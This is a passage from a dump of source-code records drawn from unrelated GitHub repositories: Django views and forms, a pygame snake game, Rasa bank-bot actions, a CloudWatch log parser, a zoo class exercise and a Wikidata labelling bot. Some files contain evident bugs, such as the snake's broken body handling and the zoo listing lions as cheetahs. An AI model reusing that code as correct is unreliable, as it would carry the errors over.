views.questionnairefail_view,name='questionnairefail'),\n #Users Profile Page View\n path('users-profile/', views.users_profile,name='users-profile'),\n #Updating Profile Page View\n path('updateProfile/', views.updateProfile, name=\"updateData\"),\n #Booking Appointment Page View\n path('donor_bookappt/', views.donor_bookappt,name='donor_bookappt'),\n #Needs Questionnaire View Page View\n path('donor_bookappNoQ/', views.donor_bookappNoQ,name='donor_bookappNoQ'),\n #Current Appointment Page View\n path('donor_currentappt//', views.donor_currentappt, name=\"donor_currentappt\"),\n #Current appointment Page Page View\n path('donor_currentappt/', views.donor_currentappt_specific, name=\"bookAppt\"),\n #Cancelling Appointment Page View\n path('donor_delete_currentappt//', views.donor_delete_currentappt, name=\"donor_delete_currentappt\"),\n]\n","repo_name":"HamzaElshakankiri/LifeSourceBloodBankWebsite","sub_path":"donor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20790742376","text":"import pygame\r\nimport random\r\n\r\n# Инициализация Pygame\r\npygame.init()\r\n\r\n# Определение размера экрана и размера блоков\r\nSCREEN_WIDTH = 600\r\nSCREEN_HEIGHT = 600\r\nBLOCK_SIZE = 10\r\n\r\n# Создание окна\r\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\r\npygame.display.set_caption(\"Змейка\")\r\n\r\n# Определение цветов\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\n\r\n# Определение функций\r\ndef draw_block(color, row, column):\r\n \"\"\"Отрисовка блока на экране\"\"\"\r\n pygame.draw.rect(screen, color, [column * BLOCK_SIZE, row * BLOCK_SIZE, BLOCK_SIZE, BLOCK_SIZE])\r\n\r\ndef generate_food():\r\n \"\"\"Генерация случайной еды для змейки\"\"\"\r\n food_row = random.randint(0, (SCREEN_HEIGHT // BLOCK_SIZE) - 1)\r\n food_column = random.randint(0, (SCREEN_WIDTH // BLOCK_SIZE) - 1)\r\n return food_row, food_column\r\n\r\n# Инициализация переменных\r\ngame_over = False\r\n\r\n# Создание змейки\r\nsnake = [(SCREEN_HEIGHT // BLOCK_SIZE) // 2, (SCREEN_WIDTH // BLOCK_SIZE) // 2]\r\nsnake_direction = \"right\"\r\n\r\n# Создание еды\r\nfood_row, food_column = generate_food()\r\n\r\n# Главный игровой цикл\r\nwhile not game_over:\r\n # Обработка событий\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n game_over = True\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n snake_direction = \"left\"\r\n elif event.key == pygame.K_RIGHT:\r\n snake_direction = \"right\"\r\n elif event.key == pygame.K_UP:\r\n snake_direction = \"up\"\r\n elif event.key == pygame.K_DOWN:\r\n snake_direction = \"down\"\r\n \r\n # Перемещение змейки\r\n if snake_direction == \"left\":\r\n snake[1] -= 1\r\n elif snake_direction == \"right\":\r\n snake[1] += 1\r\n elif snake_direction == \"up\":\r\n snake[0] -= 1\r\n elif snake_direction == \"down\":\r\n snake[0] += 1\r\n \r\n # Проверка на столкновение со стенками\r\n if snake[0] < 0 or snake[0] >= SCREEN_HEIGHT // BLOCK_SIZE or snake[1] < 0 or snake[1] >= SCREEN_WIDTH // BLOCK_SIZE:\r\n game_over = True\r\n \r\n # Проверка на столкновение с телом змейки\r\n for block in snake[1:]:\r\n if snake[0] == block[0] and snake[1] == block[1]:\r\n game_over = True\r\n \r\n # Проверка на съедание еды\r\n if snake[0] == food_row and snake[1] == food_column:\r\n food_row, food_column = generate_food()\r\n snake.append(snake[-1])\r\n \r\n # Отрисовка фона\r\n screen.fill(BLACK)\r\n \r\n # Отрисовка еды\r\n draw_block(RED, food_row)\r\n","repo_name":"LazarevaViktoriya/python_vika","sub_path":"main (12).py","file_name":"main (12).py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5931227932","text":"from django import forms\nfrom .models import Product\n\n\nclass ProductForm(forms.ModelForm):\n image = forms.ImageField(\n required=False,\n widget=forms.ClearableFileInput(attrs={\n 'multiple': True,\n })\n )\n\n field_order = [\n 'category',\n 'name',\n 'product_code',\n 'make',\n 'model',\n 'discount_code',\n 'manufacturer',\n 'price_incl_vat',\n 'fitting_cost',\n 'description',\n 'image',\n ]\n\n class Meta:\n model = Product\n fields = [\n 'category',\n 'name',\n 'product_code',\n 'make',\n 'model',\n 'discount_code',\n 'manufacturer',\n 'price_incl_vat',\n 'description',\n 'fitting_cost',\n ]\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n placeholders = {\n 'category': 'Category',\n 'name': 'Name',\n 'product_code': 'Product Code',\n 'make': 'Vehicle Make',\n 'model': 'Vehicle Model',\n 'manufacturer': 'Item Manufacturer',\n 'price_incl_vat': 'Price (incl vat)',\n 'description': 'Item Description',\n 'fitting_cost': 'Installation Cost',\n 'image': 'Image',\n 'discount_code': 'Discount Code',\n }\n\n labels = {\n 'category': 'Shop Category',\n 'image': 'Images',\n 'add_attributes': 'Add Attributes',\n 'discount_code': 'Available Discount Codes',\n }\n\n for field in self.fields:\n if field != 'price_incl_vat' and field != 'fitting_cost':\n self.fields[field].widget.attrs['class'] = 'form-control mb-1'\n elif field == 'price_incl_vat' or field == 'fitting_cost':\n self.fields[field].widget.attrs['class'] = 'form-control mb-1 mw-200'\n if field != 'category' and field != 'image' and field != \\\n 'discount_code':\n self.fields[field].label = False\n placeholder = placeholders[field]\n self.fields[field].widget.attrs['placeholder'] = placeholder\n if field == 'category' or field == 'image' or field == \\\n 'discount_code':\n label = labels[field]\n self.fields[field].label = label\n","repo_name":"Matte-gtr/AngliaPerformanceCentre","sub_path":"shop/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28120349379","text":"from typing import Any, Dict, List, Text\nfrom rasa_sdk import Tracker\nfrom rasa_sdk.events import SlotSet\nfrom rasa_sdk.executor import CollectingDispatcher\nfrom rasa_sdk.types import DomainDict\nimport queries_location\nfrom actions.base_classes import BaseFormValidationAction, BaseSubmitAction\n\n\nclass ValidateOutstandingAmountForm(BaseFormValidationAction):\n def name(self) -> Text:\n return \"validate_outstanding_amount_form\"\n\n async def validate_outstanding_amount_payment_slot(\n self,\n slot_value: Any,\n dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: DomainDict,\n ) -> Dict[Text, Any]:\n card_number = tracker.get_slot(\"extracted_card_number_slot\")\n balance = queries_location.get_balance_query_by_card_number(\n card_number)\n outstanding_amount = queries_location.get_outstanding_amount_query_by_card_number(\n card_number)\n\n payment_amount = int(slot_value)\n\n if balance < payment_amount:\n dispatcher.utter_message(\"You don't have enough funds to make this payment.\")\n return {\"outstanding_amount_payment_slot\": None}\n elif outstanding_amount < payment_amount:\n dispatcher.utter_message(\"You can't pay more than the outstanding amount.\")\n return {\"outstanding_amount_payment_slot\": None}\n else:\n return {\"outstanding_amount_payment_slot\": payment_amount}\n\n\nclass ActionSubmitOutstandingAmountForm(BaseSubmitAction):\n def name(self) -> Text:\n return \"submit_outstanding_amount_form\"\n\n async def submit(\n self,\n dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any],\n ) -> List[Dict[Text, Any]]:\n card_number = tracker.get_slot('extracted_card_number_slot')\n payment_amount = tracker.get_slot('outstanding_amount_payment_slot')\n\n queries_location.pay_outstanding_amount_query_by_card_number(card_number,\n payment_amount)\n\n dispatcher.utter_message(\"Payment successful!\")\n\n return [SlotSet('outstanding_amount_payment_slot', None)]\n","repo_name":"Ssyba/RasaBankBot","sub_path":"actions/action_outstanding_amount_form.py","file_name":"action_outstanding_amount_form.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"70086437605","text":"import os\nimport sys\nimport logging\nimport concurrent.futures\nimport pandas\nimport csv\nfrom aws_get_log_events import get_log_events\nimport time\n\nlogging.basicConfig(level=logging.INFO)\n\ncurrent_milli_time = lambda: int(round(time.time() * 1000))\nLOG_GROUP=\"spaceadapter-prod\"\n\n\nclass LogFilter(object):\n def __init__(self, name, filter, location_column_nr=None, second_value_column=None, regex=\"\"):\n self.name = name\n self.filter = filter\n self.location_column_nr = location_column_nr\n self.second_value_column = second_value_column\n self.filename = None\n self.filename_csv = None\n self.regex = regex\n self.pdseries = None\n\n def __str__(self):\n return self.name\n\n def concatenate_files(self, input_files, output_file):\n logging.debug(f\"concatenate_files(): input_files: {input_files}, output_file: '{output_file}'\")\n with open(output_file, 'w') as outfile:\n for fname in input_files:\n with open(fname) as infile:\n for line in infile:\n outfile.write(line)\n\n def convert_txt_to_csv(self, input_file, output_file):\n logging.debug(f\"convert_txt_to_csv(): input_file: {input_file}, output_file: '{output_file}'\")\n with open(input_file, 'r') as in_file:\n stripped = (line.strip() for line in in_file)\n lines = (line.replace(\",\", \"\").split(\" \") for line in stripped if line)\n with open(output_file, 'w') as out_file:\n writer = csv.writer(out_file)\n writer.writerows(lines)\n\n\n def get_filtered_logs(self, start_log_streams_number, end_log_streams_number, day):\n logging.debug(f\"get_filtered_logs(): key: {self.name}, filter: '{self.filter}'\")\n\n #cur_time = current_milli_time()\n filename_prefix = f\"{self.name}-\"\n if day == None:\n logs = get_log_events(\n log_group=LOG_GROUP,\n start_log_streams_number=start_log_streams_number,\n end_log_streams_number=end_log_streams_number,\n filter=self.filter,\n filename_prefix=filename_prefix,\n regex=self.regex,\n )\n else:\n start_time = day + \" 00:00:00\"\n end_time = day + \" 23:59:59\"\n logs = get_log_events(\n log_group=LOG_GROUP,\n start_time=start_time,\n end_time=end_time,\n filter=self.filter,\n filename_prefix=filename_prefix,\n regex=self.regex,\n )\n\n #convert file to csv\n self.filename = f\"/tmp/{self.name}\"\n self.concatenate_files(logs, self.filename)\n\n self.filename_csv = f\"{self.filename}.csv\"\n self.convert_txt_to_csv(self.filename, self.filename_csv)\n\n return self\n\n def process_csv(self):\n self._get_aggregated_stats()\n\n def _get_aggregated_stats(self):\n if self.location_column_nr and self.second_value_column:\n data = pandas.read_csv(self.filename_csv, \n header=None, \n usecols=[self.location_column_nr, self.second_value_column],\n names=['location', 'status'],\n dtype={'location':'int32','status':'str'},\n )\n self.pdseries = data\n column_name = self.name.replace(f\"{LOG_GROUP}-\", \"\")\n if column_name == f\"nr-of-items-per-store\":\n self.pdseries.columns = ['location', column_name]\n self.pdseries['status'] = \"200\"\n self.pdseries[column_name] = self.pdseries[column_name].apply(lambda x: x.split(\"/\")[1])\n self.pdseries = data.groupby(['location', 'status']).nth(0)\n #print(self.pdseries)\n else:\n #print(f\"file: {self.filename}; filter: '{self.filter}'\")\n self.pdseries = data.groupby(['location', 'status']).size()\n self.pdseries = self.pdseries.rename(column_name)\n #print(self.pdseries)\n else:\n with open(self.filename, \"r\") as file:\n print(file.read())\n\n\n\n #destructor\n #def __del__(self):\n #logging.debug(f\"cleaning files: {self.filename} and {self.filename_csv}\")\n #for file in [self.filename, self.filename_csv]:\n #if file and os.path.exists(file):\n #os.remove(file)\n\nfilters = [\n LogFilter(\n name=f\"{LOG_GROUP}-process-times\",\n filter=\"END FUNCTIONALITY\"\n ),\n LogFilter(\n name=f\"{LOG_GROUP}-nr-of-items-per-store\",\n filter=\"items progress 1\",\n regex=\".*items progress\\: 1\\/.*\",\n location_column_nr=9,\n second_value_column=18\n ),\n LogFilter(\n name=f\"{LOG_GROUP}-putProductPlacements\", \n filter=\"put To ProductPlacement response location status\",\n location_column_nr=13,\n second_value_column=17,\n ),\n LogFilter(\n name=f\"{LOG_GROUP}-getProductPlacements\",\n filter=\"OSP get product placement location status\",\n location_column_nr=11,\n second_value_column=16,\n ),\n LogFilter(\n name=f\"{LOG_GROUP}-getSpaceLocations\",\n filter=\"callGetSpaceAPI location status\",\n location_column_nr=12,\n second_value_column=16,\n ),\n LogFilter(\n name=f\"{LOG_GROUP}-putSiteRange\",\n filter=\"putToSiteRange retailerSiteId status\",\n location_column_nr=12,\n second_value_column=14,\n ),\n]\n\nif __name__ == \"__main__\": \n \n if (len(sys.argv) != 2 and len(sys.argv) != 3):\n print(\"ERROR: wrong arguments\")\n print(\"Usage: space-range-adapter-log-analysis.sh NUMBER_OF_LOG_STREAMS\")\n print(\"Usage: space-range-adapter-log-analysis.sh 8\")\n print(\"Usage: space-range-adapter-log-analysis.sh 8-16\")\n print(\"Usage: space-range-adapter-log-analysis.sh --day '2020-05-11'\")\n sys.exit(1)\n\n day = None\n start_log_streams_number = 1\n end_log_streams_number = 2\n if (len(sys.argv) == 3 and sys.argv[1] == \"--day\"):\n day = sys.argv[2]\n else:\n log_streams_number = sys.argv[1]\n if len(log_streams_number.split(\"-\")) == 2:\n start_log_streams_number = int(log_streams_number.split(\"-\")[0])\n end_log_streams_number = int(log_streams_number.split(\"-\")[1])\n else:\n end_log_streams_number = int(log_streams_number)\n\n\n results = []\n with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n try:\n stream_futures = {executor.submit(filter.get_filtered_logs, start_log_streams_number, end_log_streams_number, day): filter for filter in filters}\n except Exception as ex:\n logging.error(f\"exception: {ex}\")\n\n for future in concurrent.futures.as_completed(stream_futures):\n stream = stream_futures[future]\n filter = future.result()\n logging.debug(f\"finished getting logs from stream: {filter}\")\n filter.process_csv()\n results.append(filter)\n\n final_dataframe = None\n for filter in filters:\n if filter.pdseries is not None:\n if final_dataframe is None:\n final_dataframe = filter.pdseries\n else:\n final_dataframe = pandas.merge(final_dataframe, filter.pdseries, on=[\"location\", \"status\"], how=\"outer\")\n\n print(\"==================================================\")\n final_dataframe = final_dataframe.fillna(0)\n final_dataframe = final_dataframe.astype(\"int32\")\n final_dataframe = final_dataframe.sort_values(['location', 'status'])\n final_dataframe.loc['Total'] = final_dataframe.sum(numeric_only=True, axis=0)\n #list_name= [\"putProductPlacements\",\"getProductPlacements\", \"getSpaceLocations\",\"putSiteRange\"]\n #final_dataframe['total']=final_dataframe.loc[:,list_name].sum(axis=1)\n final_dataframe.to_csv(\"/tmp/space-range-adapter-analysis.csv\")\n print(final_dataframe.to_string())\n\n","repo_name":"DamZiobro/coding_playground","sub_path":"aws/cloudwatch/space-range-adapter-log-analysis.py","file_name":"space-range-adapter-log-analysis.py","file_ext":"py","file_size_in_byte":8183,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"72877986725","text":"from project.animal import Animal\nfrom project.worker import Worker\n\n\nclass Zoo:\n def __init__(self, name, budget, animal_capacity, workers_capacity):\n self.name = name\n self.__budget = budget\n self.__animal_capacity = animal_capacity\n self.__worker_capacity = workers_capacity\n self.animals = []\n self.workers = []\n\n \n def add_animal(self, animal: Animal, price):\n if self.__budget - price < 0:\n return \"Not enough budget\"\n\n if self.__animal_capacity == len(self.animals):\n return \"Not enough space for animal\"\n\n self.animals.append(animal)\n\n self.__budget -= price\n\n return f\"{animal.name} the {animal.__class__.__name__} added to the zoo\"\n\n\n def hire_worker(self, worker: Worker):\n if self.__worker_capacity == len(self.workers):\n return \"Not enough space for worker\"\n\n self.workers.append(worker) \n\n return f\"{worker.name} the {worker.__class__.__name__} hired successfully\"\n\n\n def fire_worker(self, worker_name):\n try:\n worker = next(filter(lambda w: w.name == worker_name, self.workers))\n except StopIteration:\n return f\"There is no {worker_name} in the zoo\"\n\n self.workers.remove(worker)\n\n return f\"{worker_name} fired successfully\"\n\n\n def pay_workers(self):\n salaries = sum([w.salary for w in self.workers])\n\n if self.__budget - salaries < 0:\n return \"You have no budget to pay your workers. They are unhappy\"\n\n self.__budget -= salaries\n\n return f\"You payed your workers. They are happy. Budget left: {self.__budget}\"\n\n\n def tend_animals(self):\n animal_cost = sum([a.money_for_care for a in self.animals])\n\n if self.__budget - animal_cost < 0:\n return \"You have no budget to tend the animals. They are unhappy.\"\n\n self.__budget -= animal_cost\n\n return f\"You tended all the animals. They are happy. Budget left: {self.__budget}\"\n\n\n def profit(self, amount):\n self.__budget += amount\n\n\n def animals_status(self):\n lions = list(filter(lambda a: a.__class__.__name__ == \"Lion\", self.animals))\n tigars = list(filter(lambda a: a.__class__.__name__ == \"Tiger\", self.animals))\n cheetahs = list(filter(lambda a: a.__class__.__name__ == \"Cheetah\", self.animals))\n \n result = [f\"You have {len(self.animals)} animals\",\n f\"----- {len(lions)} Lions:\"\n ]\n\n result.extend(lions)\n\n result.append(f\"----- {len(tigars)} Tigers:\")\n result.extend(tigars)\n\n result.append(f\"----- {len(cheetahs)} Cheetahs:\")\n result.extend(lions)\n\n return \"\\n\".join(str(r) for r in result)\n\n\n def workers_status(self):\n keepers = list(filter(lambda w: w.__class__.__name__ == \"Keeper\", self.workers))\n caretakers = list(filter(lambda w: w.__class__.__name__ == \"Caretaker\", self.workers))\n vets = list(filter(lambda w: w.__class__.__name__ == \"Vet\", self.workers))\n \n result = [f\"You have {len(self.workers)} workers\",\n f\"----- {len(keepers)} Keepers:\"\n ]\n\n result.extend(keepers)\n\n result.append(f\"----- {len(caretakers)} Caretakers:\")\n result.extend(caretakers)\n\n result.append(f\"----- {len(vets)} Vets:\")\n result.extend(vets)\n\n return \"\\n\".join(str(r) for r in result)\n\n\n\n","repo_name":"Gibinski/SoftUni-training","sub_path":"Python OOP/4. Encapsulation/Exercise/01. Wild Cat Zoo/zoo.py","file_name":"zoo.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22049057128","text":"\"\"\"\n\npython ./scripts/add_ca_label_description.py --log logs/add_ca_label_description.log\n\npython scripts/add_ca_label_description.py | tee log/20190108.log\npython scripts/add_ca_label_description.py | tee log/20190108-tmp.log\n%run scripts/add_ca_label_description.py\n\"\"\"\n#\n# import sys\n# # sys.setdefaultencoding() does not exist, here!\n# reload(sys) # Reload does the trick!\n# sys.setdefaultencoding('UTF8')\nimport argparse\nimport copy\nimport datetime\nimport logging\n\nfrom pywikibot import pagegenerators as pg\nfrom pywikibot.exceptions import OtherPageSaveError\n\nimport wikidatabot\nfrom wikidatabot.models import Item\n\n\nlogger = logging.getLogger('add_ca_label_description')\n\n\nINSTANCE_OF = 'P31'\nCOMMUNE_NOUVELLE = 'Q2989454'\nSTART_TIME = 'P580'\nEND_TIME = 'P582'\n\nREPLACES = 'P1365'\n\nLOCATED_IN = 'P131'\nDEPARTMENT_OF_FRANCE = 'Q6465'\nTNCC = {\n 'Ain': 5, 'Aisne': 5, 'Allier': 5, 'Alpes-de-Haute-Provence': 4, 'Hautes-Alpes': 4, 'Alpes-Maritimes': 4,\n 'Ardèche': 5, 'Ardennes': 4, 'Ariège': 5, 'Aube': 5, 'Aude': 5, 'Aveyron': 5, 'Bouches-du-Rhône': 4, 'Calvados': 2,\n 'Cantal': 2, 'Charente': 3, 'Charente-Maritime': 3, 'Cher': 2, 'Corrèze': 3, \"Côte-d'Or\": 3, \"Côtes-d'Armor\": 4,\n 'Creuse': 3, 'Dordogne': 3, 'Doubs': 2, 'Drôme': 3, 'Eure': 5, 'Eure-et-Loir': 1, 'Finistère': 2, 'Corse-du-Sud': 3,\n 'Haute-Corse': 3, 'Gard': 2, 'Haute-Garonne': 3, 'Gers': 2, 'Gironde': 3, 'Hérault': 5, 'Ille-et-Vilaine': 1,\n 'Indre': 5, 'Indre-et-Loire': 1, 'Isère': 5, 'Jura': 2, 'Landes': 4, 'Loir-et-Cher': 2, 'Loire': 3,\n 'Haute-Loire': 3, 'Loire-Atlantique': 3, 'Loiret': 2, 'Lot': 2, 'Lot-et-Garonne': 2, 'Lozère': 3,\n 'Maine-et-Loire': 2, 'Manche': 3, 'Marne': 3, 'Haute-Marne': 3, 'Mayenne': 3, 'Meurthe-et-Moselle': 0, 'Meuse': 3,\n 'Morbihan': 2, 'Moselle': 3, 'Nièvre': 3, 'Nord': 2, 'Oise': 5, 'Orne': 5, 'Pas-de-Calais': 2, 'Puy-de-Dôme': 2,\n 'Pyrénées-Atlantiques': 4, 'Hautes-Pyrénées': 4, 'Pyrénées-Orientales': 4, 'Bas-Rhin': 2, 'Haut-Rhin': 2,\n 'Rhône': 2, 'Haute-Saône': 3, 'Saône-et-Loire': 0, 'Sarthe': 3, 'Savoie': 3, 'Haute-Savoie': 3, 'Paris': 0,\n 'Seine-Maritime': 3, 'Seine-et-Marne': 0, 'Yvelines': 4, 'Deux-Sèvres': 4, 'Somme': 3, 'Tarn': 2,\n 'Tarn-et-Garonne': 2, 'Var': 2, 'Vaucluse': 2, 'Vendée': 3, 'Vienne': 3, 'Haute-Vienne': 3, 'Vosges': 4, 'Yonne': 5,\n 'Territoire de Belfort': 2, 'Essonne': 5, 'Hauts-de-Seine': 4, 'Seine-Saint-Denis': 3, 'Val-de-Marne': 2,\n \"Val-d'Oise\": 2, 'Guadeloupe': 3, 'Martinique': 3, 'Guyane': 3, 'La Réunion': 0, 'Mayotte': 0}\nTNCC_CA = {**TNCC, **{\n 'Ardennes': 7, 'Bouches-du-Rhône': 7, 'Calvados': 0, 'Cantal': 0, 'Charente': 2, 'Charente-Maritime': 2,\n \"Côtes-d'Armor\": 7, 'Finistère': 0, 'Corse-du-Sud': 0, 'Haute-Corse': 5, 'Haute-Garonne': 5, 'Isère': 3,\n 'Landes': 7, 'Loir-et-Cher': 0, 'Loire': 2, 'Haute-Loire': 5, 'Loire-Atlantique': 2, 'Lot': 5, 'Lot-et-Garonne': 1,\n 'Lozère': 2, 'Maine-et-Loire': 0, 'Marne': 2, 'Haute-Marne': 5, 'Mayenne': 2, 'Meuse': 2, 'Morbihan': 1,\n 'Moselle': 2, 'Nièvre': 2, 'Haut-Rhin': 5, 'Haute-Saône': 5, 'Sarthe': 2, 'Haute-Savoie': 5, 'Seine-Maritime': 2,\n 'Yvelines': 1, 'Deux-Sèvres': 0, 'Somme': 2, 'Tarn-et-Garonne': 0, 'Vaucluse': 0, 'Haute-Vienne': 5, 'Yonne': 2,\n 'Seine-Saint-Denis': 0, 'Val-de-Marne': 3, \"Val-d'Oise\": 3, 'Guadeloupe': 0, 'La Réunion': 5,\n}}\n\nDE = {0: \"de \",\n 1: \"d'\",\n 2: \"del \",\n 3: \"de la \",\n 4: \"dels \",\n 5: \"de l'\",\n 6: \"dels \",\n 7: \"de les \",\n 8: \"dels \"}\n\nQUERY = (\"\"\"\nSELECT ?item\nWHERE {\n ?item p:{instance_of} ?statement.\n ?statement ps:{instance_of} wd:{commune_nouvelle};\n pq:{start_time} ?date.\n FILTER (YEAR(?date) >= 2019).\n}\n\"\"\".replace('{instance_of}', INSTANCE_OF)\n .replace('{commune_nouvelle}', COMMUNE_NOUVELLE)\n .replace('{start_time}', START_TIME)\n)\n\nQUERY = (\"\"\"\nSELECT DISTINCT ?item\nWHERE {\n ?item p:{instance_of} ?st .\n ?st ps:{instance_of} wd:{administrative_division} .\n\n OPTIONAL{?st pq:{start_time} ?start_time_date}\n FILTER(IF(BOUND(?start_time_date), ?start_time_date <= \"{today}\"^^xsd:dateTime, true))\n\n OPTIONAL{?st pq:{end_time} ?end_time_date}\n FILTER(IF(BOUND(?end_time_date), ?end_time_date > \"{today}\"^^xsd:dateTime, true))\n}\n\"\"\").replace('{instance_of}', INSTANCE_OF)\\\n .replace('{start_time}', START_TIME)\\\n .replace('{end_time}', END_TIME)\n\n\ndef config_logger(log_filename=''):\n # Set logging level\n logger.setLevel(logging.DEBUG)\n # Create formatter\n formatter = logging.Formatter('%(asctime)s [%(levelname)8s] %(message)s')\n # Create console handler\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n if log_filename:\n # Create file handler\n fh = logging.FileHandler(filename=log_filename, encoding='utf-8')\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"Add ca label and description\")\n parser.add_argument('-t', '--to', default=COMMUNE_NOUVELLE)\n parser.add_argument('--log', default='')\n return parser.parse_args()\n\n\ndef update_label_description(item, data, summary_what):\n summary = \" and \".join(summary_what)\n summary = f\"Update ca {summary}\"\n try:\n logger.info(summary)\n item.editEntity(copy.deepcopy(data), summary=summary) # editEntity modifies data\n except OtherPageSaveError:\n logger.warning(f\"Exception while updating item {item.id}\")\n location = item\n instance_of = item.claims[INSTANCE_OF][0].target.id\n iteration = 0\n while instance_of != DEPARTMENT_OF_FRANCE and iteration < 5:\n iteration += 1\n location = location.claims[LOCATED_IN][0].target\n _ = location.get()\n instance_of = location.claims[INSTANCE_OF][0].target.id\n if instance_of != DEPARTMENT_OF_FRANCE:\n raise OtherPageSaveError\n location_ca_label = location.labels.get('ca')\n location_fr_label = location.labels.get('fr')\n ca_description = data['descriptions']['ca'] if 'descriptions' in data else item.descriptions.get('ca')\n ca_description += f\" al departament {DE[TNCC_CA[location_fr_label]]}{location_ca_label}\"\n logger.warning(f\"Retry updating with new description: {ca_description}\")\n ca_description = {'ca': ca_description}\n data['descriptions'] = ca_description\n summary_what = set(summary_what + ['description'])\n summary = \" and \".join(set(summary_what))\n summary = f\"Update ca {summary}\"\n logger.info(summary)\n item.editEntity(copy.deepcopy(data), summary=summary) # editEntity modifies data\n\n\ndef update_replaced_municipalities(item):\n replaced_statements = item.statements.get(REPLACES)\n if not replaced_statements:\n return\n logger.info(\"Start update of replaced municipalities\")\n for statement in replaced_statements:\n replaced_municipality = statement.target\n update_replaced_municipality(replaced_municipality)\n logger.info(\"End update of replaced municipalities\")\n\n\ndef update_replaced_municipality(pwb_item):\n _ = pwb_item.get()\n logger.info(f\"Replaced item: {pwb_item.getID()}\")\n data = {}\n summary_what = []\n\n # Label\n ca_label = pwb_item.labels.get('ca')\n if not ca_label:\n fr_label = pwb_item.labels.get('fr')\n if fr_label:\n ca_label = {'ca': fr_label}\n data['labels'] = ca_label\n summary_what.append('label')\n else:\n logger.error(f\"No fr label for item {pwb_item.id}\")\n else:\n logger.info(f\"ca label already present for item {pwb_item.id}: {ca_label}\")\n\n # Description\n ca_description = pwb_item.descriptions.get('ca')\n if not ca_description:\n ca_description = {'ca': 'antic municipi francès'}\n data['descriptions'] = ca_description\n summary_what.append('description')\n else:\n if ca_description.startswith('municipi'):\n if len(ca_description) > 16:\n logger.warning(f\"ca description longer than expected for item {pwb_item.id}: {ca_description}\")\n ca_description = {'ca': f'antic {ca_description}'}\n data['descriptions'] = ca_description\n summary_what.append('description')\n elif ca_description.startswith('antic'):\n logger.info(f\"ca description already updated for item {pwb_item.id}: {ca_description}\")\n else:\n logger.error(f\"ca description different than expected for item {pwb_item.id}: {ca_description}\")\n fr_description = pwb_item.descriptions.get('fr')\n if not fr_description:\n logger.warning(f\"No fr description for item {pwb_item.id}\")\n elif not fr_description.startswith('ancienne'):\n logger.warning(f\"fr description does not start with 'ancienne' for item {pwb_item.id}: {fr_description}\")\n\n # Update data\n if data:\n # entity = {'id': item.id}\n # response = wikidatabot.repo.editEntity(entity, data, summary=summary)\n # print(response)\n update_label_description(pwb_item, data, summary_what)\n\n\nif __name__ == '__main__':\n\n # Parse arguments\n args = parse_args()\n\n # Configurate logger\n config_logger(log_filename=args.log)\n logger.info('START add_ca_label_description')\n\n # Asof: today\n today = str(datetime.date.today())\n\n # Query\n query = QUERY.replace('{administrative_division}', args.to).replace('{today}', today)\n\n # Create item generator\n pwb_items = pg.WikidataSPARQLPageGenerator(query, site=wikidatabot.site)\n # pwb_items = [1]\n\n for i, pwb_item in enumerate(pwb_items):\n # pwb_item = wikidatabot.pywikibot.ItemPage(wikidatabot.repo, 'Q764858')\n # pwb_item = wikidatabot.pywikibot.ItemPage(wikidatabot.repo, 'Q43781672')\n # logger.info(pwb_item)\n pwb_item.get()\n # pwb_item_id = pwb_item.getID()\n logger.info(f\"Item: {pwb_item.getID()}\")\n item = Item.from_pwb(pwb_item)\n\n # Update REPLACES municipalities\n update_replaced_municipalities(item)\n\n data = {}\n summary_what = []\n # Label\n ca_label = item.labels.get('ca')\n if not ca_label:\n fr_label = item.labels.get('fr')\n if fr_label:\n ca_label = {'ca': fr_label}\n data['labels'] = ca_label\n summary_what.append('label')\n else:\n logger.error(f\"No fr label for item {item.id}\")\n else:\n logger.info(f\"ca label already present for item {item.id}: {ca_label}\")\n\n # Description\n ca_description = item.descriptions.get('ca')\n if not ca_description:\n fr_description = item.descriptions.get('fr')\n if not fr_description:\n logger.warning(f\"No fr description for item {item.id}\")\n elif not fr_description.startswith('commune'):\n logger.warning(f\"fr description does not start with 'commune' for item {item.id}: {fr_description}\")\n ca_description = {'ca': 'municipi francès'}\n data['descriptions'] = ca_description\n summary_what.append('description')\n else:\n # TODO:\n logger.info(f\"ca description already present for item {item.id}: {ca_description}\")\n\n # Update data\n if data:\n # entity = {'id': item.id}\n # response = wikidatabot.repo.editEntity(entity, data, summary=summary)\n # print(response)\n update_label_description(pwb_item, data, summary_what)\n\n # if i >= 0:\n # break\n logger.info('END add_ca_label_description')\n","repo_name":"albertvillanova/WikidataBot","sub_path":"scripts/add_ca_label_description.py","file_name":"add_ca_label_description.py","file_ext":"py","file_size_in_byte":11770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75168659044","text":"import pytest\n\nfrom model_loader import get_sentiment\n\n\n@pytest.mark.parametrize(\n \"text, expected_result\",\n [\n (\"Этот город самый лучший город на Земле!\", \"positive\"),\n (\"Этот город самый худший город на Земле!\", 